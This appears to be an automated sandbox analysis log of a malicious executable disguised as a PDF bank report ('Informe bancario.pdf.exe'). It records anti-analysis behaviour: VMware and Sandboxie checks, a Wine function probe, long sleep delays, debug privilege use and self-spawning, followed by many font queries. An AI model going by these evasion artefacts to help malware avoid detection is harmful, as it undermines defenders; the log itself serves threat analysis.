Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Informe bancario.pdf.exe PID: 6496, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe TID: 6524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe TID: 6828	Thread sleep time: -300000s >= -30000s

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Thread delayed: delay time: 60000

Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Process created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Users\user\Desktop\Informe bancario.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
